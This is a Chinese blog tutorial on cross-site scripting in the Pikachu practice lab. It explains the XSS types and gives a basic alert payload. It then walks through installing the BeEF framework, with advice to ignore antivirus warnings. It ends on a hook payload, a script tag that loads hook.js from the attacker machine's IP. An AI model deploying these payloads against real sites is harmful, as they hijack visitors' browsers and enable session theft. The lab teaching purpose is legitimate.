<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.15.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="XSS,该文章由于内容,点开就会触发XSS">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu靶场系列-xss">
<meta property="og:url" content="http://example.com/2023/05/04/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/xss/index.html">
<meta property="og:site_name" content="欢 迎 光 临">
<meta property="og:description" content="XSS,该文章由于内容,点开就会触发XSS">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/assets/1660183695659-3123c470-f608-4694-b555-23d2741c5e75.png">
<meta property="og:image" content="http://example.com/images/1660186046326-4d44628a-58c7-457d-90ed-96f14c503504.png">
<meta property="og:image" content="http://example.com/images/image-20230108165651096.png">
<meta property="og:image" content="http://example.com/images/image-20230108165800888.png">
<meta property="og:image" content="http://example.com/images/image-20230108170143782.png">
<meta property="og:image" content="http://example.com/images/1660272799566-358ac5e0-a1d0-41e1-8baf-fddcd4d5bef0.png">
<meta property="og:image" content="http://example.com/images/1660272885067-9a84d647-c2e3-4e2f-a726-de1e9d91ccea.png">
<meta property="og:image" content="http://example.com/images/1660273051219-eacadab3-5b6a-41e0-81a0-25102f9c3337.png">
<meta property="og:image" content="http://example.com/images/1660273246927-955ad279-5970-48da-aeea-f60169d3aa66.png">
<meta property="og:image" content="http://example.com/images/1660273284160-d43efe33-735d-47ed-afd2-0fc84bd2a331.png">
<meta property="og:image" content="http://example.com/images/1660273396042-19900f44-d5a1-43d4-b1e4-ea70fcf991c0.png">
<meta property="og:image" content="http://example.com/images/1660273432143-abf8f51a-aa13-4153-ba8c-92b64387d022.png">
<meta property="og:image" content="http://example.com/images/1660274095597-5d0a5c5d-ae55-4c06-9db9-cee2268a2fb8.png">
<meta property="og:image" content="http://example.com/images/1662617312740-0ed9d6ef-f86b-42b1-a38f-1e4bacd65d8f.png">
<meta property="og:image" content="http://example.com/images/1662617482276-c28ec953-08dc-4b2a-b974-786779e9b345.png">
<meta property="og:image" content="http://example.com/images/1660476633506-b93b6ac7-2f8c-476c-957e-b738bcea1750.png">
<meta property="og:image" content="http://example.com/images/1660184936621-b04dfb7b-3a7b-4f43-8402-b665448d06e4.png">
<meta property="og:image" content="http://example.com/images/1660185365090-0dcdec0a-d027-4b2f-959b-fabf9b5d6230.png">
<meta property="og:image" content="http://example.com/images/1660185501321-c7b0d245-99a4-4105-b5da-a72d56c0036c.png">
<meta property="og:image" content="http://example.com/images/1660185676861-9595165b-756c-46cc-afb1-ddf2ead09de2.png">
<meta property="og:image" content="http://example.com/images/1660185993458-1c631800-176a-4506-a867-489816d8e492.png">
<meta property="og:image" content="http://example.com/images/1660185960775-3d08b7c5-6199-44cf-9065-a0c127699488.png">
<meta property="og:image" content="http://example.com/images/1660186338853-0af903af-6785-46b8-9d4c-5af5fdb84308.png">
<meta property="og:image" content="http://example.com/images/1660186626342-0cc88d27-f63f-4f2a-9329-c4027d952498.png">
<meta property="og:image" content="http://example.com/images/1660186598976-013e91db-3e38-4995-a190-ae926e8eb50c.png">
<meta property="og:image" content="http://example.com/images/1660187377093-761310f5-2c3c-4592-8546-546236b52087.png">
<meta property="og:image" content="http://example.com/images/1660186806768-2ad9856c-676a-46a2-b34b-e8f8919fd84a.png">
<meta property="og:image" content="http://example.com/images/1660188619423-f9acd23a-bf2f-496e-bcac-e579b485d986.png">
<meta property="og:image" content="http://example.com/images/1660188991267-eb771206-5a58-44f3-99df-fa44d9d722dc.png">
<meta property="og:image" content="http://example.com/images/1660189006511-4813c1c4-9010-4789-8da6-56a049bc66ab.png">
<meta property="og:image" content="http://example.com/images/1660476725683-a4db4011-7712-44b5-b103-b66429005e53.png">
<meta property="og:image" content="http://example.com/images/1660270330674-45d49425-c4f4-4192-b6be-e8ede2722051.png">
<meta property="og:image" content="http://example.com/images/1660270354073-bda7e2e1-c31f-4596-a317-c39de9586345.png">
<meta property="og:image" content="http://example.com/images/1660270377285-9b1c3bac-230c-451b-b8bc-165e8fc53a37.png">
<meta property="og:image" content="http://example.com/images/1660270428509-83838f57-b9c4-456f-8037-5c5b003c1397.png">
<meta property="og:image" content="http://example.com/images/1660272799566-358ac5e0-a1d0-41e1-8baf-fddcd4d5bef0.png">
<meta property="og:image" content="http://example.com/images/1660272885067-9a84d647-c2e3-4e2f-a726-de1e9d91ccea.png">
<meta property="og:image" content="http://example.com/images/1660273051219-eacadab3-5b6a-41e0-81a0-25102f9c3337.png">
<meta property="og:image" content="http://example.com/images/1660273246927-955ad279-5970-48da-aeea-f60169d3aa66.png">
<meta property="og:image" content="http://example.com/images/1660273284160-d43efe33-735d-47ed-afd2-0fc84bd2a331.png">
<meta property="og:image" content="http://example.com/images/1660273396042-19900f44-d5a1-43d4-b1e4-ea70fcf991c0.png">
<meta property="og:image" content="http://example.com/images/1660273432143-abf8f51a-aa13-4153-ba8c-92b64387d022.png">
<meta property="og:image" content="http://example.com/images/1660274095597-5d0a5c5d-ae55-4c06-9db9-cee2268a2fb8.png">
<meta property="og:image" content="http://example.com/images/1662618457481-02526d36-c474-4b34-930a-88bcc7e994ad.png">
<meta property="og:image" content="http://example.com/images/1662618556441-26f7763e-33a1-44be-b399-e354008e787d.png">
<meta property="og:image" content="http://example.com/images/1662619049036-41394025-6721-467d-9b09-b15fde9a206b.png">
<meta property="og:image" content="http://example.com/images/1662621427146-b9300938-f2ee-4a3e-a152-fe2c26a4756e.png">
<meta property="og:image" content="http://example.com/images/1662621081022-4933e3f5-efac-4491-900c-af86413897e9.png">
<meta property="og:image" content="http://example.com/images/image-20230107224210191.png">
<meta property="og:image" content="http://example.com/images/1660291585340-ecdca394-b111-4505-b7b3-f72b0df0f35e.png">
<meta property="og:image" content="http://example.com/images/1660291862424-93c60fa9-14f7-4ffd-afa2-c890fdbba430.png">
<meta property="og:image" content="http://example.com/images/1660295072228-82da965b-ff25-475a-bd72-5b2f350f3421.png">
<meta property="og:image" content="http://example.com/images/1660295264667-593a7c3d-8210-4392-bada-e495fbaeac13.png">
<meta property="og:image" content="http://example.com/images/1660295272768-f1c011f0-8ce5-48f9-a308-440eef974a84.png">
<meta property="og:image" content="http://example.com/images/1662622837438-afaae957-f195-46b4-b2df-57311da7e03c.png">
<meta property="og:image" content="http://example.com/images/1662622629801-cb87a0c8-53ea-4fa5-ac4b-adb43578ca1d.png">
<meta property="og:image" content="http://example.com/images/1662623756155-e22ac861-92b7-4ed3-8eae-d1db2cb8d455.png">
<meta property="og:image" content="http://example.com/images/1662624234083-f986c7ba-f92f-4f3f-a2f7-ec93690f21bf.png">
<meta property="og:image" content="http://example.com/images/1662624224148-501c0bca-1a61-49f1-badd-fb029a0f75e0.png">
<meta property="og:image" content="http://example.com/images/image-20230107233737057.png">
<meta property="og:image" content="http://example.com/images/image-20230107235014624.png">
<meta property="og:image" content="http://example.com/images/image-20230108191822262.png">
<meta property="og:image" content="http://example.com/images/image-20230108203249590.png">
<meta property="og:image" content="http://example.com/images/image-20230108212120454.png">
<meta property="og:image" content="http://example.com/images/image-20230108211941551.png">
<meta property="og:image" content="http://example.com/images/image-20230108213754256.png">
<meta property="og:image" content="http://example.com/images/image-20230108220509951.png">
<meta property="og:image" content="http://example.com/images/image-20230108222853591.png">
<meta property="og:image" content="http://example.com/images/image-20230108224804638.png">
<meta property="og:image" content="http://example.com/images/image-20230109085110147.png">
<meta property="og:image" content="http://example.com/images/image-20230109085127282.png">
<meta property="og:image" content="http://example.com/images/image-20230109085300848.png">
<meta property="og:image" content="http://example.com/images/image-20230109085540498.png">
<meta property="og:image" content="http://example.com/images/image-20230109090052786.png">
<meta property="og:image" content="http://example.com/images/image-20230109090104388.png">
<meta property="og:image" content="http://example.com/images/image-20230109090247285.png">
<meta property="og:image" content="http://example.com/images/image-20230109090328767.png">
<meta property="og:image" content="http://example.com/images/image-20230109090507237.png">
<meta property="og:image" content="http://example.com/images/image-20230109090547150.png">
<meta property="og:image" content="http://example.com/images/image-20230109090602207.png">
<meta property="og:image" content="http://example.com/images/image-20230109094736189.png">
<meta property="og:image" content="http://example.com/images/image-20230109094912346.png">
<meta property="og:image" content="http://example.com/images/image-20230109095120480.png">
<meta property="og:image" content="http://example.com/images/image-20230109095418811.png">
<meta property="og:image" content="http://example.com/images/image-20230108023741293.png">
<meta property="og:image" content="http://example.com/images/image-20230108023827084.png">
<meta property="og:image" content="http://example.com/images/image-20230108024052825.png">
<meta property="og:image" content="http://example.com/images/image-20230108024128492.png">
<meta property="og:image" content="http://example.com/images/image-20230108030928953.png">
<meta property="og:image" content="http://example.com/images/image-20230108025041967.png">
<meta property="og:image" content="http://example.com/images/image-20230108025123698.png">
<meta property="og:image" content="http://example.com/images/image-20230108030049268.png">
<meta property="og:image" content="http://example.com/images/image-20230108030444690.png">
<meta property="og:image" content="http://example.com/images/image-20230108170625920.png">
<meta property="og:image" content="http://example.com/images/image-20230108170850091.png">
<meta property="og:image" content="http://example.com/images/image-20230109094424113.png">
<meta property="og:image" content="http://example.com/images/image-20230109094619596.png">
<meta property="og:image" content="http://example.com/images/image-20230109094603430.png">
<meta property="og:image" content="http://example.com/images/image-20230109091304591.png">
<meta property="og:image" content="http://example.com/images/image-20230109092023309.png">
<meta property="og:image" content="http://example.com/images/image-20230109092702680.png">
<meta property="article:published_time" content="2023-05-04T02:58:20.722Z">
<meta property="article:modified_time" content="2023-05-04T13:57:34.957Z">
<meta property="article:author" content="fn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/assets/1660183695659-3123c470-f608-4694-b555-23d2741c5e75.png">


<link rel="canonical" href="http://example.com/2023/05/04/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/xss/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/05/04/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/xss/","path":"2023/05/04/pikachu靶场系列/xss/","title":"pikachu靶场系列-xss"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>pikachu靶场系列-xss | 欢 迎 光 临</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">欢 迎 光 临</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS%E6%A6%82%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">XSS概述</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="nav-number">1.0.0.0.1.</span> <span class="nav-text">存储型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8BXSS"><span class="nav-number">1.0.0.0.2.</span> <span class="nav-text">反射型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#DOM%E5%9E%8BXSS"><span class="nav-number">1.0.0.0.3.</span> <span class="nav-text">DOM型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%BE%A8%E5%88%AB"><span class="nav-number">1.0.0.0.4.</span> <span class="nav-text">辨别</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9C%80%E5%9F%BA%E6%9C%AC%E7%9A%84payload"><span class="nav-number">1.0.0.0.5.</span> <span class="nav-text">最基本的payload</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">1.1.</span> <span class="nav-text">参考</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BeEF-XSS%E5%88%A9%E7%94%A8%E6%A1%86%E6%9E%B6%E5%AE%89%E8%A3%85"><span class="nav-number">2.</span> <span class="nav-text">BeEF XSS利用框架安装</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%89%E8%A3%85"><span class="nav-number">2.1.</span> <span class="nav-text">安装</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-number">2.2.</span> <span class="nav-text">利用</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss"><span class="nav-number">3.</span> <span class="nav-text">反射型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss-get"><span class="nav-number">3.1.</span> <span class="nav-text">反射型xss(get)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss-post"><span class="nav-number">3.2.</span> <span class="nav-text">反射型xss(post)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8Edocument-cookie"><span class="nav-number">3.2.1.</span> <span class="nav-text">关于document.cookie</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cookie%E5%88%A9%E7%94%A8"><span class="nav-number">3.2.2.</span> <span class="nav-text">cookie利用</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8Bxss"><span class="nav-number">4.</span> <span class="nav-text">存储型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8Bxss%E5%88%A9%E7%94%A8"><span class="nav-number">4.1.</span> <span class="nav-text">存储型xss利用</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DOM%E5%9E%8Bxss"><span class="nav-number">5.</span> <span class="nav-text">DOM型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM%E6%A6%82%E8%BF%B0"><span class="nav-number">5.1.</span> <span class="nav-text">DOM概述</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#test1"><span class="nav-number">5.1.1.</span> <span class="nav-text">test1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%92%E5%85%A5payload"><span class="nav-number">5.1.2.</span> <span class="nav-text">插入payload</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BA%8B%E4%BB%B6%E8%A7%A6%E5%8F%91"><span class="nav-number">5.1.2.0.1.</span> <span class="nav-text">事件触发</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%97%AD%E5%90%88a%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.0.2.</span> <span class="nav-text">闭合a标签</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SVG%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.1.</span> <span class="nav-text">SVG标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#a%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.2.</span> <span class="nav-text">a标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#input%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.3.</span> <span class="nav-text">input标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#iframe%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.4.</span> <span class="nav-text">iframe标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#audio%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.5.</span> <span class="nav-text">audio标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#video%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.6.</span> <span class="nav-text">video标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#button%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.7.</span> <span class="nav-text">button标签</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#object%E6%A0%87%E7%AD%BE"><span class="nav-number">5.1.2.8.</span> <span class="nav-text">object标签</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B6%E4%BB%96"><span class="nav-number">5.1.3.</span> <span class="nav-text">其他</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83-1"><span class="nav-number">5.2.</span> <span class="nav-text">参考</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#xss%E4%B9%8Bjs%E8%BE%93%E5%87%BA"><span class="nav-number">6.</span> <span class="nav-text">xss之js输出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98-1"><span class="nav-number">6.1.</span> <span class="nav-text">解题</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">fn</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">总计</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/04/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/xss/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="fn">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="欢 迎 光 临">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="pikachu靶场系列-xss | 欢 迎 光 临">
      <meta itemprop="description" content="XSS,该文章由于内容,点开就会触发XSS">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pikachu靶场系列-xss
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-05-04 10:58:20 / 修改时间：21:57:34" itemprop="dateCreated datePublished" datetime="2023-05-04T10:58:20+08:00">2023-05-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/" itemprop="url" rel="index"><span itemprop="name">pikachu靶场系列</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>6.8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>12 分钟</span>
    </span>
</div>

            <div class="post-description">XSS,该文章由于内容,点开就会触发XSS</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="XSS概述"><a href="#XSS概述" class="headerlink" title="XSS概述"></a>XSS概述</h1><p><img src="/./assets/1660183695659-3123c470-f608-4694-b555-23d2741c5e75.png" alt="img"></p>
<p>具体来说，XSS攻击有两种类型：存储型XSS和反射型XSS，此外还涉及一种DOM型的XSS。</p>
<h5 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h5><p>指的是将攻击代码存储在网站的数据库中，等待用户访问时自动执行。</p>
<h5 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h5><p>指的是将攻击代码作为URL参数的值传递给服务器，服务器将其直接输出到浏览器端，从而在用户的浏览器中执行攻击代码。</p>
<h5 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h5><p>是一种比较特殊的XSS攻击，它利用浏览器中的DOM（文档对象模型）漏洞来实现攻击。与传统的XSS攻击相比，DOM型XSS有一些明显的区别：</p>
<p>1.DOM型XSS不依赖于服务器的输出，因此无需修改服务器端代码来攻击。</p>
<p>2.DOM型XSS攻击的源代码不会被服务器端的代码直接输出，而是通过浏览器的JavaScript代码在客户端进行解析和执行。</p>
<p>3.DOM型XSS攻击的攻击范围更广，可以通过各种手段（如邮件、聊天工具、社交媒体等）将攻击代码传递给用户，从而对用户的浏览器进行攻击。</p>
<h5 id="辨别"><a href="#辨别" class="headerlink" title="辨别"></a>辨别</h5><p>如何辨别一个XSS攻击是否为DOM型XSS呢？下面是几个可以帮助你进行辨别的方法：</p>
<p>1.检查攻击代码是否被服务器端的代码直接输出。如果攻击代码被直接输出，则可能是反射型XSS；如果攻击代码未被直接输出，则可能是DOM型XSS。</p>
<p>2.检查攻击代码是否来自用户的输入。如果攻击代码来自用户的输入，则可能是DOM型XSS；如果攻击代码不是来自用户的输入，则可能是存储型XSS。</p>
<p>3.检查攻击代码是否依赖于浏览器的JavaScript代码执行。如果攻击代码依赖于浏览器的JavaScript代码执行，则可能是DOM型XSS；如果攻击代码不依赖于浏览器的JavaScript代码执行，则可能是存储型XSS。</p>
<h5 id="最基本的payload"><a href="#最基本的payload" class="headerlink" title="最基本的payload"></a>最基本的payload</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>该payload会在浏览器上跳出一个弹窗</p>
<p>xss就是在我们可控的地方放入可解析的代码</p>
<p><img src="/images/1660186046326-4d44628a-58c7-457d-90ed-96f14c503504.png" alt="img"></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/zfYRi8kCu1KRb17cjXo7Zg">https://mp.weixin.qq.com/s/zfYRi8kCu1KRb17cjXo7Zg</a></p>
<h1 id="BeEF-XSS利用框架安装"><a href="#BeEF-XSS利用框架安装" class="headerlink" title="BeEF XSS利用框架安装"></a>BeEF XSS利用框架安装</h1><p>攻击机使用的是kali系统(免费，可直接下载)</p>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>apt install beef-xss安装BeeF攻击框架，这里就不详细展开了，安装好后web页面如下图。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install beef-xss</span><br></pre></td></tr></table></figure>

<p>如果提示无法定位软件包，可以先apt-get update后再尝试</p>
<p>如果还是不行，可手动安装</p>
<p><a target="_blank" rel="noopener" href="https://beefproject.com/">https://beefproject.com/</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/beefproject/beef">https://github.com/beefproject/beef</a></p>
<p>下载后可能会报毒，不用在意</p>
<p>放置kali后解压</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./install</span><br></pre></td></tr></table></figure>

<p>如果还不行可能和新旧版本的kali有关系</p>
<p>可在其他linux系统安装，这里使用的是ubuntu</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./beef</span><br></pre></td></tr></table></figure>

<p>第一次运行需要修改密码</p>
<p><img src="/images/image-20230108165651096.png" alt="image-20230108165651096"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gedit config.yaml</span><br></pre></td></tr></table></figure>

<p>此处更改为自己的用户名密码</p>
<p><img src="/images/image-20230108165800888.png" alt="image-20230108165800888"></p>
<p>然后登录web界面</p>
<p><img src="/images/image-20230108170143782.png" alt="image-20230108170143782"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.28.150:3000/ui/authentication</span><br></pre></td></tr></table></figure>

<p><img src="/images/1660272799566-358ac5e0-a1d0-41e1-8baf-fddcd4d5bef0.png"></p>
<p>登录进入后台，用户名为beef</p>
<p><img src="/images/1660272885067-9a84d647-c2e3-4e2f-a726-de1e9d91ccea.png" alt="img"></p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>beef启动时命令行会给出web页面地址和攻击payload</p>
<p>使用脚本安装的可能没有，自己补全即可</p>
<p><img src="/images/1660273051219-eacadab3-5b6a-41e0-81a0-25102f9c3337.png" alt="img"></p>
<p>payload换上攻击机的ip地址，直接上</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=&quot;http://192.168.28.150:3000/hook.js&quot;&gt;&lt;/script&gt;</span><br></pre></td></tr></table></figure>

